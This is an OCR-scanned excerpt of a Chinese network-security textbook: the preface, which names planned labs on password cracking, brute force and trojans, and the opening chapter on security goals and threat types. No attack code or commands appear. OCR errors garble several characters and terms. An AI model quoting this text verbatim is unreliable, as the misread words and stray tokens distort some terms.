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着 我 国 社会 经 济 的 发 展 , 计 算 机 网 络 迅速 普及 ,已 经 渗透 到 人 们 生活 的 方方面面 。 然 而 

由 于 网 络 自身 固有 的 脆弱 ,使 网 络 安 全 存在 很 多 潜在 的 威胁 。 中 国 已 经 进入 了 全 民 互 
联网 时 代 , 在 如 此 发 达 的 网 络 时 代 如 何 保障 国家 安全 ,促进 经 济 更 好 地 发 展 ,更 好 地 服务 网 
民 也 就 成 了 当前 网 络 安全 管理 的 重要 目标 。 网 络 安 全 技术 课程 已 经 成 为 计算 机 类 及 网 络 工 
程 专业 的 必修 课程 ,本 书 可 作为 本 科 院 校 高 等 职业 院 校 . 成 人 教育 计算 机 网 络 、 通 信 工 程 等 
专业 的 教材 ,也 可 作为 网 络 安全 的 培训 教材 。 

使 用 本 教材 第 一 版 的 学 校 较 多 ,受到 老师 和 同学 们 的 喜爱 ,同时 读者 也 提出 了 很 多 中 肯 
的 建议 ,在 此 基础 上 作者 对 第 一 版 进行 修订 ,对 部 分 内 容 进 行 了 重新 编写 ,增加 了 网 络 人 侵 
工具 .应 用 漏洞 的 攻击 方法 .木马 的 相关 内 容 , 修 改 了 13 个 实验 ,如 密码 破解 工具 
Mimikatz, FTP 服务 暴力 破解 .MS SQL 暴力 破解 ,利用 木马 进行 系统 提 权 等 ,以 满足 新 时 
期 网 络 安 全 的 需要 。 

全 书 分 为 4 个 部 分 ,具体 内 容 介 绍 如 下 。 

第 1 部 分 是 网 络 安全 基础 知识 ,包括 两 章 : 第 1 章 计 算 机 网 络 安全 概述 ,介绍 了 网 络 安 
全 的 定义 、 基 本 要 求 . 网 络 安全 的 两 大 体系 结构 、 网 络 安全 的 现状 、 立 法 和 评价 标准 。 第 2 章 
网 络 安全 协议 基础 ,分 析 了 IP、TCP、UDP 和 ICMP 的 结构 并 介绍 了 一 些 常 用 的 网 络 命令 。 

第 2 部 分 是 网 络 安全 防御 技术 ,包括 三 章 : 第 3 章 操作 系统 安全 配置 ,介绍 了 Linux 下 
安全 守则 和 Windows Server 2008 的 安全 配置 。 第 4 章 密码 学 基础 ,介绍 了 密码 学 的 基本 
概念 和 三 种 加 密 算法 .数字 签名 和 数字 信封 ,数字 水 印 技术 等 。 第 5 章 防 火 墙 与 人 侵 检测 
介绍 了 防火 墙 和 入 侵 检测 系统 的 定义 ,防火 墙 的 分 类 及 建立 步骤 ,入 侵 检 测 系统 的 方法 , 它 
们 的 区 别 和 联系 。 

第 3 部 分 网 络 安全 攻击 技术 ,包括 三 章 : 第 6 章 黑客 与 攻击 方法 ,介绍 了 黑客 攻击 的 5 
部 曲 和 相关 的 攻击 工具 、 应 用 漏洞 攻击 及 SQL 注入 攻击 、XSS 攻击 。 第 7 R DoS 和 DDoS, 
介绍 了 SYN 风暴 、Smurf 攻击 以 及 DDoS 的 特点 。 第 8 章 网 络 后 门 与 隐身 ,介绍 了 后 门 的 
定义 及 实现 后 门 和 隐身 的 方法 .后门 工具 的 使 用 .木马 的 定义 .原理 、 种 类 以 及 木马 工具 的 
使 用 。 

第 4 部 分 实验 ,包括 涵盖 全 书 内 容 的 37 个 实验 。 

本 书 在 讲解 相关 理论 的 同时 , 附 有 大 量 的 图 例 , 尤 其 是 第 4 部 分 实验 ,图 片 就 有 300 多 
张 ,做 到 了 理论 知识 和 实际 操作 的 紧密 结合 。 本 书 既是 一 本 讲授 用 的 教材 ,又 是 一 本 实用 的 
实验 指导 书 。 
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本 书 中 的 授课 幻灯 片 和 实验 使 用 的 工具 软件 都 可 从 http://www. tup. tsinghua. edu. 
cn/ 网 站 下 载 ,也 可 以 与 作者 联系 ,作者 E-mail: 417543645(2 qq. com. 

本 书 由 马 丽 梅 . 王 方 伟 主编 , 赵 冬 梅 教授 主 审 , 王 长 广 . 马 彦 华 . 于 富强 、 李 大 顺 、 王 天 马 、 
悦 东 明 、 井 波 等 参 编 。 本 教材 总 计 分 为 9 章 , 其 中 具体 的 编写 任务 如 下 : 第 1 章 由 马 丽 梅 、 
王 方 伟 编写 ,第 2 章 由 王 长 广 编写 ,第 3 章 由 王 方 伟 、 马 丽 梅 编写 ,第 4 章 由 马 丽 梅 . 于 富强 
编写 ,第 5 章 由 马 丽 梅 . 王 方 伟 编写 ,第 6 章 由 王 方 伟 、 马 彦 华 编写 ,第 7 章 由 马 丽 梅 编写 ,第 
8 章 由 王 方 伟 编写 ,第 9 章 实验 由 王 方 伟 、 马 丽 梅 指导 ,北京 林业 大 学 经 济 管理 学 院 王 天 马 ， 
河北 师范 大 学 汇 华 学 院 李 大 顺 、 悦 东明 、 井 波 共同 完成 。 全 书 由 马 丽 梅 、 王 方 伟 统 稿 。 

特别 感谢 赵 冬 梅 教授 对 本 书 编写 的 悉心 指导 和 审核 ,感谢 广西 师范 学 院 龙 珑 教授 提出 
的 宝贵 建议 。 在 编写 过 程 中 吸取 了 许多 网 络 安全 方面 的 专著 .论文 的 思想 ,得 到 了 许多 老师 
的 帮助 ,在 此 一 并 表示 感谢 。 
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学 习 目 标 ; 

m 掌握 网 络 安全 的 定义 、 网 络 安全 的 基本 要 求 、 网 络 安全 的 两 大 体系 结构 一 一 攻击 和 
防御 。 

w 了 解 网 络 安全 的 现状 、 网 络 立法 和 评价 标准 。 


随 着 互联 网 的 快速 发 展 和 信息 化 程度 的 不 断 提高 ,网 络 安 全 和 信息 化 事 关 经 济 社会 发 
展 大 局 。 当 前 我 国 国民 经 济 和 社会 信息 化 建设 正在 发 生 重大 的 变化 ,网 络 安全 和 信息 化 不 
仅 事 关 国家 的 总 体 安全 ,而 且 涉 及 相关 管理 体制 的 全 面 改 革 。 然 而 由 于 网 络 自身 固有 的 脆 
弱 性 ,使 网 络 安全 存在 很 多 潜在 的 威胁 。 网 络 安全 是 一 个 关系 国家 安全 和 主权 、 社 会 稳定 、 
民族 文化 继承 和 发 扬 的 重要 问题 。 其 重要 性 , 正 随 着 全 球 信 息 化 步伐 的 加 快 越 来 越 突显 。 
中 央 成 立 了 以 国家 最 高 领导 人 为 组 长 的 网 络 安全 信息 化 领导 小 组 , 随 之 各 地 政府 也 相应 成 
立 了 网 络 安全 信息 化 领导 小 组 ,这 是 互联 网 在 中 国 发 展 20 年 来 具有 划时代 意义 的 大 事 , 这 
既 体 现 了 中 国政 府 深化 改革 发 展 的 决心 和 意志 ,更 展现 了 新 一 代 中 国 领导 集体 的 豁 智和 远 
见 , 此 举 预示 着 中 国 互联 网 发 展 将 进入 全 新 的 发 展 时 期 。 习 总 书记 强调 ,网 络 安全 和 信息 化 
是 事 关 国家 安全 和 国家 发 展 、 事 关 广 大 人 民 群 众 工 作 生 活 的 重大 战略 问题 ; 没有 网 络 安全 
就 没有 国家 安全 ,没有 信息 化 就 没有 现代 化 。 在 当今 这 样 “ 数 字 经 济 ” 的 时 代 , 网 络 安全 显得 
尤为 重要 ,也 受到 人 们 越 来 越 多 的 关注 。 

中 国 已 经 进入 了 全 民 互 联网 时 代 , 那 么 在 如 此 发 达 的 网 络 时 代 如 何 保障 国家 安全 ,促进 
经 济 更 好 地 发 展 ,更 好 地 服务 网 民 , 也 就 成 了 当前 网 络 安 全 信息 管理 的 重要 目标 。 

一 是 维护 网 络 安全 ,打造 安全 稳定 健康 的 网 络 环境 的 必要 之 举 。 从 当前 我 国 面临 的 日 
益 严 峻 的 网 络 安全 环境 看 , 随 着 互联 网 的 快速 发 展 和 信息 化 程度 的 不 断 提 高 ,互联 网 深刻 影 
响 着 政治 、 经 济 文化 等 各 个 方面 ,保障 信息 安全 的 重要 性 日 益 凸 显 ,加 强 对 互联 网 上 各 类 信 
息 的 管理 尤为 重要 。 

二 是 规范 网 民 行为 ,维护 国家 安全 稳定 的 有 力 保障 。 网 络 时 代 , 国 家 安全 有 了 新 的 定 
义 , 没 有 互联 网 的 安全 ,国家 安全 也 就 无 从 谈 起 。 以 立法 方式 规范 互联 网 行为 ,坚决 打击 网 
络 违法 行为 。 坚 决 抵制 当前 西方 敌对 势力 将 网 络 作为 和 平 演变 中 国 的 一 种 新 的 武器 的 恶劣 
行为 。 

三 是 培养 网 络 人 才 ,推进 网 络 自 主 的 重要 举措 。 中 国 是 一 个 大 国 , 必 须要 培养 自己 的 网 
络 人 才 , 建 立 属于 自己 的 独立 、 安 全 的 网 络 安全 环境 ,拥有 一 流 的 网 络 技术 人 才 。 

计算 机 网 络 安全 面临 的 问题 很 多 ,可 以 分 为 以 下 三 种 。 

1. 自然 灾害 

计算 机 信息 系统 仅仅 是 一 个 智能 的 机 器 , 易 受 到 自然 灾害 及 环境 (温度 、 湿 度 、 振 动 、 冲 
击 、 污 染 ) 的 影响 。 目 前 ,不 少 计算 机 机 房 抵 御 自然 灾害 和 意外 事故 的 能 力 较 差 ,日常 工作 中 
因 断 电 而 设备 损坏 、 数 据 丢 失 的 现象 时 有 发 生 。 由 于 噪声 和 电磁 辐射 ,导致 网 络 信 品 比 下 
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降 , 误 码 率 增加 ,信息 的 安全 性 、 完 整 性 和 可 用 性 受到 威胁 。 

2. 黑客 攻击 

这 种 人 为 的 恶意 攻击 是 计算 机 网 络 所 面临 的 最 大 威胁 ,也 是 网 络 安全 防范 策略 的 首要 
对 象 。 黑 客 一 旦 非法 入 侵 资 源 共 享 广泛 的 政治 军事、 经 济 和 科学 等 领域 ,盗用 .暴露 和 算 改 
大 量 在 网 络 中 存储 和 传输 的 数据 ,其 造成 的 损失 是 无 法 估量 的 。 

3. 恶意 代码 

恶意 代码 是 一 种 违背 目标 系统 安全 策略 的 程序 代码 ,可 造成 目标 系统 信息 泄露 和 资源 
滥用 ,破坏 系统 的 完整 性 及 可 用 性 。 它 能 够 经 过 存储 介质 或 网 络 进行 传播 ,未 经 授权 认证 访 
问 或 破坏 计算 机 系统 。 通 常 许多 人 认为 “病毒 "代表 了 所 有 感染 计算 机 并 造成 破坏 的 程序 。 
事实 上 ,恶意 代码 更 为 通用 ,病毒 只 是 一 种 类 型 的 恶意 代码 而 已 。 恶 意 代码 的 种 类 主要 包括 
计算 机 病毒 .蠕虫 .特洛伊 木马 .逻辑 炸弹 、 细 菌 、 恶 意 脚本 和 恶意 ActiveX 控件 .间谍 软件 
(spyware) 等 ,严重 破坏 数据 资源 ,影响 计算 机 的 使 用 功能 ,甚至 导致 计算 机 系统 瘫痪 ,破坏 
网 络 基 础 设施 。 目 前 ,很 多 网 络 安全 事件 都 是 由 恶意 代码 所 导致 的 。 


1.1 信息 安全 和 网 络 安全 


信息 安全 是 一 门 涉 及 计算 机 科学 、 网 络 技 术 、 通 信 技 术 、 密 码 技术 ,信息 安全 技术 、 应 用 
数学 ,数论 ,信息论 等 多 种 学 科 的 综合 性 学 科 ,是 一 门 交 叉 学 科 , 广 义 上 讲 , 信 息 安全 涉及 多 
方面 的 理论 和 应 用 知识 ,除了 数学 .通信 、 计 算 机 等 自然 科学 外 ,还 涉及 法 律 , 心 理学 等 社会 
科学 ,而 网 络 安全 是 信息 安全 学 科 的 重要 组 成 部 分 。 

计算 机 网 络 安全 被 国际 标准 化 组 织 (ISO) 定 义 为 : 计算 机 网 络 安全 是 指 网 络 系统 的 硬 
件 、 软 件 及 其 系统 中 的 数据 受到 保护 ,不 因 偶然 的 或 者 恶意 的 原因 而 遭受 到 破坏 、 更 改 、 泄 
露 , 系 统 连 续 可 靠 正常 地 运行 ,网 络 服务 不 中 断 。 网 络 安全 包含 网 络 设备 安全 、 网 络 信息 安 
全 、 网 络 软件 安全 。 从 广义 来 说 ,凡是 涉及 网 络 上 信息 的 保密 性 、 完 整 性 、 可 用 性 、 真 实 性 和 
可 控 性 的 相关 技术 和 理论 都 是 网 络 安全 的 研究 领域 。 


1.1.1 网 络 安全 的 基本 要 求 


信息 安全 的 目标 是 保护 信息 的 保密 性 、 机 密 性 、 完 整 性 、 可 用 性 、 可 靠 性 \ 不 可 抵赖 性 、 可 
控 性 ,也 有 的 观点 认为 是 机 密 性 、 完 整 性 和 可 用 性 , 即 CIA (Confidentiality. Integrity， 
Availability) 。 

1. 机 密 性 ,保密 性 

机 密 性 是 指 保 证 信息 不 能 被 非 授权 访问 ,即使 非 授 权 用 户 得 到 信息 也 无 法 知晓 信息 内 
容 , 因 而 不 能 使 用 。 保 密 性 是 指 网 络 信息 不 被 泄露 给 非 授权 的 用 户 、 实 体 或 过 程 , 即 信息 只 
为 授权 用 户 使 用 。 保 密 性 是 在 可 靠 性 和 可 用 性 基础 上 保障 网 络 信息 安全 的 重要 手段 。 常 用 
的 保密 技术 如 下 。 

(1) 物理 保密 : 利用 各 种 物理 方法 ,如 限制 隔离. 掩蔽、 控制 等 措施 ,保护 信息 不 被 
TEE. 
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(2) 防 窃听 : 使 对 手 接收 不 到 有 用 的 信息 。 

(3) 防 辐射 : 防止 有 用 信息 以 各 种 途径 辐射 出 去 。 

(4) 信息 加 密 : 在 密 钥 的 控制 下 ,用 加 密 算 法 对 信息 进行 加 密 处 理 。 即 使 对 手 得 到 了 
加 密 后 的 信息 也 会 因为 没有 密 钥 而 无 法 读 民 有效 信息 。 

2. 完整 性 

完整 性 是 网 络 信息 未 经 授权 不 能 进行 改变 的 特性 。 即 网 络 信息 在 存储 或 传输 过 程 中 保 
持 不 被 偶然 或 蓄意 地 删除 、 修 改 、 伪 造 、 乱 序 、 重 放 、 插 入 等 破坏 和 丢失 的 特性 。 完 整 性 是 一 
种 面向 信息 的 安全 性 , 它 要 求 保持 信息 的 原样 , 即 信 息 的 正确 生成 和 正确 存储 和 传输 。 信 息 
的 完整 性 包括 两 个 方面 : 数据 完整 性 ,指数 据 没 有 被 未 授权 算 改 或 者 损坏 ; @ 系 统 完整 
性 , 指 系统 未 被 非法 操纵 , 按 既 定 的 目标 运行 。 

完整 性 与 保密 性 不 同 ,保密 性 要 求 信 息 不 被 泄露 给 未 授权 的 人 ,而 完整 性 则 要 求 信 息 不 
致 受到 各 种 原因 的 破坏 。 影 响 网 络 信息 完整 性 的 主要 因素 有 设备 故障 、 误 码 (传输 .处 理 和 
存储 过 程 中 产生 的 误 码 ,定时 的 稳定 度 和 精度 降低 造成 的 误 码 ,各 种 干扰 源 造成 的 误 码 )、 人 
为 攻击 .计算 机 病毒 等 。 保 障 网 络 信息 完整 性 的 主要 方法 如 下 。 

(1) 协议 : 通过 各 种 安全 协议 可 以 有 效 地 检测 出 被 复制 的 信息 、 被 删除 的 字段 、 失 效 的 
字段 和 被 修改 的 字段 。 

(2) 纠 错 编码 方法 : 由 此 完成 检 错 和 纠 错 功能 。 最 简单 和 常用 的 纠 错 编码 方法 是 奇偶 
校 验 法 。 

(3) 密码 校 验 和 方法 : 它 是 抗 窜改 和 传输 失败 的 重要 手段 。 

(4) 数字 签名 : 保障 信息 的 真实 性 。 

(5) 公证 : 请 求 网 络 管理 或 中 介 机 构 证 明 信 息 的 真实 性 。 

3. 可 用 性 

可 用 性 是 指 保障 信息 资源 随时 可 提供 服务 的 能 力 特 性 , 即 授权 用 户 根据 需要 可 以 随时 
访问 所 需 信息 。 可 用 性 是 信息 资源 服务 功能 和 性 能 可 靠 性 的 度量 ,涉及 物理 ,网络 、 系 统 、 数 
据 \ 应 用 和 用 户 等 多 方面 的 因素 ,是 对 信息 网 络 总 体 可 靠 性 的 要 求 。 可 用 性 还 应 该 满足 以 下 
要 求 。 

(1) 身份 识别 与 确认 。 

(2) 访问 控制 : 对 用 户 的 权限 进行 控制 ,只 能 访问 相应 权限 的 资源 ,防止 或 限制 经 隐蔽 
通道 的 非法 访问 ,包括 自主 访问 控制 和 强制 访问 控制 。 

CD 业务 流 控制 : 利用 均 分 负荷 方法 ,防止 业务 流量 过 度 集中 而 引起 网 络 阻塞 。 

(4) 路 由 选择 控制 : 选择 那些 稳定 可 靠 的 子 网 .中 继 线 或 链 路 等 。 

(5) 审计 跟踪 : 把 网 络 信息 系统 中 发 生 的 所 有 安全 事件 情况 存储 在 安全 审计 跟踪 之 
中 ,以 便 分 析 原 因 ,分 清 责任 ,及 时 采取 相应 的 措施 。 审 计 跟 踪 的 信息 主要 包括 事件 类 型 .被 
管 客体 等 级 .事件 时 间 、 事 件 信息 .事件 回答 以 及 事件 统计 等 方面 的 信息 。 

AHAHA: 访问 控制 (access control) 就 是 在 身份 认证 的 基础 上 ,依据 授权 对 提出 的 
资源 访问 请 求 加 以 控制 。 访 问 控制 是 网 络 安全 防范 和 保护 的 主要 策略 , 它 可 以 限制 对 关键 
资源 的 访问 ,防止 非法 用 户 的 侵入 或 合法 用 户 的 不 慎 操 作 所 造成 的 破坏 。 

例如 ,用 户 的 入 网 访问 控制 。 用 户 的 入 网 控制 可 分 为 三 个 步骤 : 用 户 名 的 识别 与 验证 、 
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用 户口 令 的 识别 与 验证 .用 户 账 号 的 默认 限制 检查 。 用 户 账 号 应 只 有 系统 管理 员 才 能 建立 。 
口令 控制 应 该 包括 最 小 口令 长 度 、 强 制 修改 口令 的 时 间 间 隔 \ 口 令 的 唯一 性 ,口令 过 期 失效 
后 允许 人 网 的 宽 限 次 数 等 。 网 络 应 能 控制 用 户 登 录入 网 的 站 点 (地 址 )、 限 制 用 户 人 网 的 时 
间 、 限 制 用 户 入 网 的 工作 站 数量 。 当 用 户 对 交 费 网 络 的 访问 “资费 ”用 尽 时 ,网 络 还 应 能 对 用 
户 的 账号 加 以 限制 ,用 户 此 时 应 无 法 进入 网 络 访问 网 络 资源 。 网 络 信息 系统 应 对 所 有 用 户 
的 访问 进行 审计 。 

4. 可 靠 性 

可 靠 性 是 网 络 信息 系统 能 够 在 规定 条 件 下 和 规定 的 时 间 内 完成 规定 的 功能 的 特性 。 可 
靠 性 是 系统 安全 的 最 基本 要 求 之 一 ,是 所 有 网 络 信息 系统 的 建设 和 运行 目标 。 可 靠 性 主要 
表现 在 硬件 可 靠 性 、 软 件 可 靠 性 .人 员 可 靠 性 .环境 可 靠 性 等 方面 。 硬 件 可 靠 性 最 为 直观 和 
常见 。 软 件 可 靠 性 是 指 在 规定 的 时 间 内 ,程序 成 功 运行 的 概率 。 人 员 可 靠 性 是 指 人 员 成 功 
地 完成 工作 或 任务 的 概率 。 人 员 可 靠 性 在 整个 系统 可 靠 性 中 扮演 重要 角色 ,因为 系统 失效 
的 大 部 分 原因 是 人 为 差错 造成 的 。 人 的 行为 要 受到 生理 和 心理 的 影响 ,受到 其 技术 熟练 程 
E 责任 心 和 品德 等 素质 方面 的 影响 。 因 此 ,人 员 的 教育 .培养 .训练 和 管理 以 及 合理 的 人 机 
界面 是 提高 可 靠 性 的 重要 方面 。 环 境 可 靠 性 是 指 在 规定 的 环境 内 ,保证 网 络 成 功 运行 的 概 
率 。 这 里 的 环境 主要 是 指 自然 环境 和 电磁 环境 。 网 络 信息 系统 的 可 靠 性 测度 主要 有 三 种 : 
抗 毁 性 .生存 性 和 有 效 性 。 

CD 抗 毁 性 是 指 系统 在 人 为 破坏 下 的 可 靠 性 。 比 如 ,部 分 线路 或 结 点 失效 后 ,系统 是 否 
仍然 能 够 提供 一 定 程度 的 服务 。 增 强 抗 毁 性 可 以 有 效 地 避免 因 各 种 灾害 (战争 .地 震 等 ) 造 
成 的 大 面积 瘫痪 事件 。 

(2) 生存 性 是 在 随机 破坏 下 系统 的 可 靠 性 。 生 存 性 主要 反映 随机 性 破坏 和 网 络 拓扑 结 
构 对 系统 可 靠 性 的 影响 。 这 里 ,随机 性 破坏 是 指 系统 部 件 因 为 自然 老化 等 造成 的 自然 失效 。 

(3) 有 效 性 是 一 种 基于 业务 性 能 的 可 靠 性 。 有 效 性 主要 反映 在 网 络 信息 系统 的 部 件 失 
效 情况 下 ,满足 业务 性 能 要 求 的 程度 。 比 如 ,网 络 部 件 失效 虽然 没有 引起 连接 性 故障 ,但 是 
却 造 成 质量 指标 下 降 .平均 延 时 增加 、 线 路 阻塞 等 现象 。 

5. 不 可 抵赖 性 (真实 性 ) 

也 称 作 不 可 和 否认 性 。 在 网 络 信息 系统 的 信息 交互 过 程 中 ,确信 参与 者 的 真实 同一 性 。 
即 , 所 有 参与 者 都 不 可 能 否认 或 抵赖 曾经 完成 的 操作 和 承诺 。 利 用 信息 源 证 据 可 以 防止 发 
信 方 不 真实 地 否认 已 发 送信 息 ,利用 递交 接收 证 据 可 以 防止 收 信 方 事后 否认 已 经 接收 的 
信息 。 

6. 可 控 性 (可 说 明 性 ) 

可 控 性 是 对 网 络 信息 的 传播 及 内 容 具 有 控制 能 力 的 特性 , 即 确保 个 体 的 活动 可 被 跟踪 。 
概括 地 说 ,网 络 信 息 安全 与 保密 的 核心 是 通过 计算 机 、 网 络 、 密 码 技 术 和 安全 技术 ,保护 在 公 
用 网 络 信 息 系 统 中 传输 、 交 换 和 存储 的 消息 的 保密 性 、 完 整 性 、 真 实 性 、 可 靠 性 、 可 用 性 、 不 可 
1.1.2 网 络 安全 面临 的 威胁 


所 谓 的 安全 威胁 是 指 某 个 实体 (人 、 事 件 、 程 序 等 ) 对 某 一 资源 的 机 密 性 、 完 整 性 、 可 用 性 
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在 合法 使 用 时 可 能 造成 的 危害 。 这 些 可 能 出 现 的 危害 是 某 些 个 别 用 心 的 人 通过 一 定 的 攻击 
手段 来 实现 的 。 

安全 威胁 可 分 成 故意 的 (如 系统 入 侵 ) 和 偶然 的 (如 将 信息 发 到 错误 地 址 ) 两 类 。 故 
意 威胁 又 可 进一步 分 成 被 动 威胁 和 主动 威胁 两 类 。 被 动 威胁 只 对 信息 进行 监听 ,而 不 对 
其 修改 和 破坏 。 主 动 威胁 则 对 信息 进行 故意 算 改 和 破坏 ,使 合法 用 户 得 不 到 可 用 信息 ， 
具体 包括 物理 威胁 、 系 统 漏洞 造成 的 威胁 、 身 份 鉴 别 威胁 、 线 缆 连 接 威胁 、 有 害 程序 等 方 
面 的 威胁 。 

1. 物理 威胁 

物理 威胁 包括 4 个 方面 : 偷窃 .废物 搜寻 间谍 行 为 和 身份 识别 错误 。 

D 偷窃 

网 络 安全 中 的 偷 穷 包括 偷窃 设备 偷窃 信息 和 偷窃 服务 等 内 容 。 如 果 他 们 想 偷 的 信息 
在 计算 机 里 , 那 他 们 一 方面 可 以 将 整 台 计 算 机 偷 走 , 男 一 方面 可 以 通过 监视 器 读 取 计算 机 中 
的 信息 。 

2) 废物 搜寻 

就 是 在 废物 (如 一 些 打 印 出 来 的 材料 或 废弃 的 硬盘 ) 中 搜寻 所 需要 的 信息 。 在 微型 计算 
机 上 ,废物 搜寻 可 能 包括 从 未 抹 掉 有 用 东西 的 硬盘 上 获得 有 用 资料 。 

3) 间谍 行为 

是 一 种 为 了 省 钱 或 获取 有 价值 的 机 密 、 采 用 不 道德 的 手段 获取 信息 ,有 时 政府 也 有 可 能 
卷 人 这 种 间谍 活动 中 。 

4) 身份 识别 错误 

非法 建立 文件 或 记录 ,企图 把 它们 作为 有 效 的 、 正 式 生 产 的 文件 或 记录 ,如 对 具有 身份 
鉴别 特征 物品 如 护照 ,执照 出 生 证 明 或 加 密 的 安全 卡 进行 伪造 ,属于 身份 识别 发 生 错 误 的 
范畴 。 这 种 行为 对 网 络 数 据 构 成 了 巨大 的 威胁 。 

2. 系统 漏洞 造成 的 威胁 

系统 漏洞 造成 的 威胁 包括 三 个 方面 : 乘虚 而 人 \ 不 安全 服务 和 配置 和 初始 化 错误 。 

1) 乘虚 而 人 

例如 ,用 户 A 停止 了 与 某 个 系统 的 通信 ,但 由 于 某 种 原因 仍 使 该 系统 上 的 一 个 端口 处 
于 激活 状态 ,这 时 ,用 户 B 通过 这 个 端口 开始 与 这 个 系统 通信 ,这 样 就 不 必 通 过 任何 申请 使 
用 端口 的 安全 检查 了 。 

2) 不 安全 服务 

有 时 操作 系统 的 一 些 服务 程序 可 以 绕 过 机 器 的 安全 系统 ,互联 网 蠕虫 就 利用 了 UNIX 
系统 中 三 个 可 绕 过 的 机 制 。 蠕 虫 利用 一 个 sendmail 程序 已 存在 的 一 个 漏洞 来 获取 其 他 机 
器 的 控制 权 。 病 毒 一 般 会 利用 rexec \fingerd 或 者 口令 猜 解 来 尝试 连接 。 在 成 功 和 信 侵 之 后 ， 
它 会 在 目标 机 器 上 编译 源 代码 并 且 执 行 它 , 而 且 会 有 一 个 程序 来 专门 负责 隐藏 自己 的 脚印 。 

3) 配置 和 初始 化 错误 

如 果 不 得 不 关 掉 一 台 服 务 器 以 维修 它 的 某 个 子 系统 , 几 天 后 当 重 启动 服务 器 时 ,可 能 会 
招致 用 户 的 抱怨 ,说 他 们 的 文件 丢失 了 或 被 自 改 了 ,这 就 有 可 能 是 在 系统 重新 初始 化 时 , 安 
全 系统 没有 正确 地 初始 化 ,从 而 留 下 了 安全 漏洞 让 人 利用 ,类 似 的 问题 在 木马 程序 修改 了 系 
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统 的 安全 配置 文件 时 也 会 发 生 。 

3. 身份 鉴别 造成 的 威胁 

身份 鉴别 造成 的 威胁 包括 4 个 方面 : 口令 圈套 ,口令 破解 .算法 考虑 不 周 和 编 辑 口令 。 

1) 口令 圈套 

口令 圈套 是 网 络 安 全 的 一 种 诡计 ,与 冒名 顶替 有 关 。 常 用 的 口令 圈套 通过 一 个 编译 代 
码 模 块 实现 , 它 运行 起 来 和 登录 屏幕 一 模 一 样 ,被 插入 到 正常 登录 过 程 之 前 ,最 终 用 户 看 到 
的 只 是 先后 两 个 登录 屏幕 ,第 一 次 登录 失败 了 ,所 以 用 户 被 要 求 再 输入 用 户 名 和 口令 。 实 际 
上 ,第 一 次 登录 并 没有 失败 , 它 将 登录 数据 ,如 用 户 名 和 口令 写 入 一 个 数据 文件 中 ,留待 
使 用 。 

2) 口令 破解 

破解 口令 就 像 是 猜测 自行 车 密码 锁 的 数字 组 合 一 样 , 在 该 领域 中 已 形成 许多 能 提高 成 
功率 的 技巧 。 

3) 算法 考虑 不 周 

口令 输入 过 程 必须 在 满足 一 定 条 件 时 才能 正常 地 工作 ,这 个 过 程 通过 某 些 算法 实现 。 
在 一 些 攻击 入 侵 案例 中 ,入 侵 者 采用 超 长 的 字符 串 破 坏 了 口令 算法 ,成 功 地 进入 了 系统 。 

4) 编辑 口令 

编辑 口令 需要 依靠 操作 系统 漏洞 ,如 果 公 司 内 部 的 人 建立 了 一 个 虚设 的 账户 或 修改 
了 一 个 隐 含 账户 的 口令 ,这 样 ,任何 知道 那个 账户 的 用 户 名 和 口令 的 人 便 可 以 访问 该 机 
器 了 。 

4. 线 缆 连 接 造成 的 威胁 

线 缆 连 接 造成 的 威胁 包括 三 个 方面 : 窃听 、 拨 号 进入 和 冒名 顶替 。 

D 窃听 

对 通信 过 程 进行 窃听 可 达到 收集 信息 的 目的 ,这 种 电子 窃听 不 一 定 需要 将 窃听 设备 安 
装 在 电缆 上 ,通过 检测 从 连 线 上 发 射出 来 的 电磁 辐射 就 能 拾取 所 要 的 信号 ,为 了 使 机 构 内 部 
的 通信 有 一 定 的 保密 性 ,可 以 使 用 加 密 手段 来 防止 信息 被 解密 。 

2) 拨号 进入 

拥有 一 个 调制 解 调 器 和 一 个 电话 号 码 ,每 个 人 都 可 以 试图 通过 远程 拨号 访问 网 络 ,尤其 
是 拥有 所 期 望 攻击 的 网 络 的 用 户 账户 时 ,就 会 对 网 络 造成 很 大 的 威胁 。 

3) 冒名 顶替 

通过 使 用 别人 的 密码 和 账号 获得 对 网 络 及 其 数据 程序 的 使 用 能 力 。 这 种 办 法 实现 起 
来 并 不 容易 ,而 且 一 般 需 要 有 机 构 内 部 的 ,了解 网 络 和 操作 过 程 的 人 参与 。 

5. 恶意 代码 造成 的 威胁 

恶意 代码 造成 的 威胁 主要 包括 三 个 方面 : 计算 机 病毒 .网 络 蠕虫 和 特洛伊 木马 。 

1) 计算 机 病毒 

计算 机 病毒 (computer virus) 是 编制 者 在 计算 机 程序 中 插入 的 破坏 计算 机 功能 或 者 数 
据 的 代码 ,能 影响 计算 机 使 用 ,能 自我 复制 的 一 组 计算 机 指令 或 者 程序 代码 。 就 像 生 物 病 毒 
一 样 ,具有 自我 繁殖 、 互 相传 当 以 及 激活 再 生 等 生物 病毒 特征 。 计 算 机 病毒 有 独特 的 复制 能 
力 ,能 够 快速 蔓延 ,又 常常 难以 根除 。 计 算 机 病毒 能 把 自身 附着 在 各 种 类 型 的 文件 上 , 当 文 
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件 被 复制 或 从 一 个 用 户 传 送 到 另 一 个 用 户 时 ,它们 就 随同 文件 一 起 蔓延 开 来 。 

2) 网 络 蠕虫 

网 络 蠕虫 是 一 种 智能 化 .自动 化 ,综合 了 网 络 攻击 .密码 学 和 计算 机 病毒 技术 ,无 须 计算 
机 使 用 者 干预 即 可 运行 的 攻击 程序 或 代码 , 它 会 扫描 和 攻击 网 络 上 存在 系统 漏洞 的 结 点 主 
机 ,通过 局 域 网 或 者 国际 互联 网 从 一 个 结 点 传播 到 另外 一 个 结 点 ,体现 了 新 一 代 网 络 蠕虫 智 
能 化 .自动 化 和 高 技术 化 的 特征 。 它 同 计算 机 病毒 的 区 别 是 : 不 需要 用 户 干预 ,通过 网 络 
传播 。 

3) 特洛伊 木马 

特洛伊 木马 (Trojan horse) 的 名 称 取 自 希腊 神话 的 特洛伊 木马 记 。 木 马 就 是 指 那些 内 
部 包含 为 完成 特殊 任务 而 编制 的 代码 的 程序 ,这 些 特殊 功能 处 于 隐藏 状态 ,执行 时 不 为 人 发 
觉 。 特 洛 伊 木 马 是 一 种 基于 远程 控制 的 工具 ,类 似 于 远 端 管理 软件 ,其 区 别 是 木马 具有 隐蔽 
性 和 非 授 权 性 的 特点 。 特 洛 伊 木 马 程序 一 旦 被 安装 到 机 器 上 , 便 可 按 编制 者 的 意图 行事 。 
其 特点 是 伪装 成 一 个 实用 工具 或 者 一 个 可 爱 的 游戏 , 诱 使 用 户 将 其 安装 在 PC 或 者 服务 器 
上 ,并 进行 各 种 破坏 性 活动 。 


